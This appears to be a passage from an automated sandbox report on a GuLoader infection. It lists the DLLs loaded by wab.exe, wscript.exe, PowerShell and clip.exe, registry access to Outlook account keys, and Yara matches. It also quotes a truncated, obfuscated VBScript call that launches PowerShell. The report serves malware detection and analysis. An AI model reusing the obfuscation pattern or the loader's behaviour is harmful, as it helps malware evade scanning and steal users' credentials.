            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: Binary string: System.Core.pdbF! source: powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gqm.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdbq source: powershell.exe, 00000005.00000002.2489484769.00000000086E0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1989736522.000001A47F191000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1991997565.000001A47E636000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2498526890.000000000351D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.2494277320.00000000059E5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2899923505.0000000008681000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: wab.exe
            Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000005.00000002.2469252560.0000000007622000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbTe= source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5c}c source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb7} source: powershell.exe, 00000016.00000002.2885377459.00000000074A9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2469252560.00000000075C9000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5eU source: powershell.exe, 00000005.00000002.2469252560.000000000764A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000016.00000002.2885377459.0000000007413000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("PowerShell "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$E", "Unsupported parameter type 00000000")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000005.00000002.2491020170.000000000A67A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.2900609762.000000000902B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2490726122.0000000008980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2461742751.0000000005DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.2900248668.0000000008830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.2872130350.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
